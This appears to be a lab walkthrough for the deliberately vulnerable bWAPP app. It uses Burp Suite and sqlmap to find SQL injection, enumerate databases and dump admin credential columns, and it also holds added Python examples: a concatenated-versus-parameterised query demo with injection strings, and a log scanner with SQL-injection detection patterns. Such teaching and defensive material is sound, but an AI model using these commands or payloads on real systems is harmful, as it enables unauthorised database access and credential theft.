SQL Injection Lab Guide with SQLMap

Uploaded by ajaypalsingh7275

Name: SQL Injection with SQLMap

URL: [Link]

Type: Tools of Trade

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

In this lab exercise, we will take a look at how to use SQLMap to perform SQL Injection attacks
on the bWAPP web application.

Objective: Perform a SQL Injection attack on the web application with SQLMap.

Exploitation:

Step 1: Find the IP address of the Kali machine.

Command: ip addr

Step 2: Run an nmap scan against the target IP (the next IP in the range).

Command: nmap [Link]


Step 3: Open Firefox and visit the website. Log into bWAPP using the given credentials bee:bug.

Step 4: Select “SQL Injection (GET/Search)” from the list and press the “Hack” button.

Step 5: On the “SQL Injection (GET/Search)” page, type “hello” in the search bar and press the
“Search” button.
Notice the URL: the “hello” string is being passed as a URL parameter.

Step 6: Start Burp Proxy in intercept mode and also select “Burp” in the FoxyProxy plugin.

Step 7: Refresh the page (or search for “hello” again). Intercept the request in Burp Proxy
and copy the cookie. SQLMap needs this cookie to work.

Step 8: Run SQLMap on the target [Link] with “title” as the test parameter (the input string was
passed as the value of title).

Command: sqlmap -u "[Link]" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title

SQLMap has found that the title parameter is vulnerable and also suggested three payloads (SQL
queries).

Step 9: Send the captured request to Repeater.

Step 10: Copy the first payload and paste it as part of the title parameter. Then send the
request to the server.

Step 11: Check the response. It throws a SQL syntax error.

Step 12: Copy the second payload from the SQLMap output and paste it into the request tab of
Burp Repeater. Send the request.

Step 13: Check the response. It also throws a SQL syntax error.
Step 14: Use sqlmap to get a list of the databases present on the database server.

Command: sqlmap -u "[Link]" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title --dbs

Step 15: Use sqlmap to get a list of the tables in the bWAPP database.

Command: sqlmap -u "[Link]" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP --tables
Step 16: Use sqlmap to get the list of columns in the users table of the bWAPP database.

Command: sqlmap -u "[Link]" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP -T users --columns

Step 17: Use sqlmap to dump the password and email of the admin from the users table. Press ‘n’
twice when prompted.

Command: sqlmap -u "[Link]" --cookie "PHPSESSID=ipcund5314149g188pfhb3pff1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
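The syntax errors seen in Steps 11 and 13 are the symptom of the defect that Steps 14 to 17 then exploit: the search string is pasted into the SQL text. The following is an added example, not part of this lab guide and not bWAPP's own code; it models a "title" search over a constructed in-memory SQLite table (table name, columns and rows are invented) in a string-concatenating form and a parameterised form, so the difference in behaviour can be observed directly rather than through Burp Repeater.

```python
import sqlite3

# Added example (not part of the lab guide or bWAPP): a minimal "title" search
# endpoint in two variants. The movies table and its rows are constructed here.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, year INTEGER)"
    )
    conn.executemany(
        "INSERT INTO movies (title, year) VALUES (?, ?)",
        [("Hello Again", 2011), ("Iron Giant", 1999), ("Silent Hill", 2006)],
    )
    conn.commit()
    return conn


def search_unsafe(conn, title):
    # String concatenation: the user's input becomes part of the SQL text,
    # so a quote in the input changes the query's structure.
    query = (
        "SELECT title, year FROM movies WHERE title LIKE '%" + title + "%' ORDER BY id"
    )
    return conn.execute(query).fetchall()


def search_safe(conn, title):
    # Parameterised query: the driver sends the value separately from the
    # SQL text, so the input can only ever be compared, never executed.
    query = "SELECT title, year FROM movies WHERE title LIKE ? ORDER BY id"
    return conn.execute(query, ("%" + title + "%",)).fetchall()


def probe(conn, search, title):
    """Run a search and report either the rows or the database error class.

    This mirrors what the lab observes in Burp Repeater: data, or a SQL
    syntax error when the quoting is broken by the input.
    """
    try:
        return {"rows": search(conn, title), "error": None}
    except sqlite3.OperationalError as exc:
        return {"rows": None, "error": exc.__class__.__name__}


if __name__ == "__main__":
    db = make_db()
    for text in ("hello", "hello'", "' OR 1=1 OR '"):
        print(repr(text), "unsafe:", probe(db, search_unsafe, text))
        print(repr(text), "safe:  ", probe(db, search_safe, text))
```

With the benign input both variants return the one matching row. With a single trailing quote the concatenated query fails to parse (the same class of error the lab sees in Step 11), while the parameterised query simply finds no title containing a quote. With an input that adds an always-true condition, the concatenated query returns every row and the parameterised query returns none; the fix is the `?` placeholder, not escaping the input.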

Step 18: Turn off the intercept mode of Burp Suite.

Step 19: Select “SQL Injection (POST/Search)” from the list and press the “Hack” button.

Step 20: Turn on the intercept mode of Burp Suite again.

Step 21: Search for “Hello” from this search page.


Step 22: The intercepted request shows that the search string was sent as the value of the
title parameter in a POST request.

Step 23: Copy the intercepted request to a file.

Step 24: Save the file as “request”.

Step 25: Check the content of the request file.

Command: cat request


Step 26: Run SQLMap with this saved file. Again take “title” as the test parameter.

Command: sqlmap -r request -p title

SQLMap suggested three payloads for this one too.

Step 27: Send the captured request to Repeater.

Step 28: Copy the payload from the SQLMap output and add it to the POST data (as part of the
value of the title parameter).

Step 29: Check the response. It seems to be an error due to a duplicate entry.

Step 30: Change the request to pass the version() function to the database.

Step 31: The database version information can be observed in the response.
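Seen from the server side, both exercises above (the GET/Search run in Steps 8 to 17 and the POST/Search run in Steps 26 to 31) leave recognisable traces. The following is an added example, not part of this lab guide or of sqlmap: a small scanner over web-server access-log lines in combined format. The log lines, hostnames, paths and addresses are constructed for the example; the only real identifier relied on is that sqlmap's default User-Agent string begins with `sqlmap/`.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Added example (not part of the lab guide or sqlmap): detection-side view of
# an injection test against a "title" search parameter. All log lines below
# are constructed; paths and addresses do not correspond to bWAPP.

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fragments that have no business in a movie-title search. Checked after
# parse_qs has URL-decoded the value, so %27 does not hide a quote.
# This is a heuristic: expect some false positives on unusual titles.
SUSPECT_RE = re.compile(
    r"'|--|/\*|\bunion\b|\bselect\b|\bor\s+\d+\s*=\s*\d+|\b(?:version|sleep)\s*\(",
    re.I,
)


def parse_line(line):
    """Parse one combined-format access-log line; None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target, watched=("title",)):
    """Return {param: decoded value} for watched query params that look like SQL."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name in watched:
        for value in qs.get(name, []):
            if SUSPECT_RE.search(value):
                hits[name] = value
    return hits


def analyse(lines, burst_threshold=20):
    """Return findings as (client_ip, reason, detail) tuples."""
    findings = []
    per_client_path = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        per_client_path[(rec["ip"], path)] += 1
        # sqlmap identifies itself by default; treat this as a convenience
        # signal only, since any client can send an arbitrary User-Agent.
        if rec["ua"].lower().startswith("sqlmap/"):
            findings.append((rec["ip"], "tool-user-agent", rec["ua"]))
        for name, value in suspicious_params(rec["target"]).items():
            findings.append((rec["ip"], "sql-metachar-in-param", f"{name}={value}"))
    # POST bodies are not recorded in access logs, so the POST/Search variant
    # only shows up here as an unusual volume of requests to one path.
    for (ip, path), n in per_client_path.items():
        if n >= burst_threshold:
            findings.append((ip, "request-burst", f"{n} requests to {path}"))
    return findings


# Constructed sample log: one ordinary search, a quote probe sent with the
# default tool User-Agent, a version() probe, and a burst of POST requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:00:01 +0000] "GET /search.php?title=hello&action=search HTTP/1.1" '
    '200 4321 "http://example.test/search.php" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:00:02 +0000] "GET /search.php?title=hello%27&action=search HTTP/1.1" '
    '200 1201 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:10:00:03 +0000] "GET /search.php?title=hello%27%20and%20version()%3d%27&action=search HTTP/1.1" '
    '200 1180 "-" "Mozilla/5.0"',
] + [
    f'10.0.0.9 - - [12/Mar/2024:10:01:{i:02d} +0000] "POST /search_post.php HTTP/1.1" '
    '200 1150 "-" "Mozilla/5.0"'
    for i in range(25)
]


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

On the sample, the ordinary user produces nothing, the quote probe produces two findings (tool User-Agent and a quote in `title`), the `version()` probe is caught by the decoded parameter check even though its User-Agent looks like a browser, and the POST run is visible only as a burst. In practice the parameter and rate checks carry the weight; the User-Agent match is cheap but easily absent. Logging request bodies (or running the check in a WAF or application middleware) is what makes the POST variant inspectable by content.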

References

1. bWAPP ([Link])
2. sqlmap ([Link])
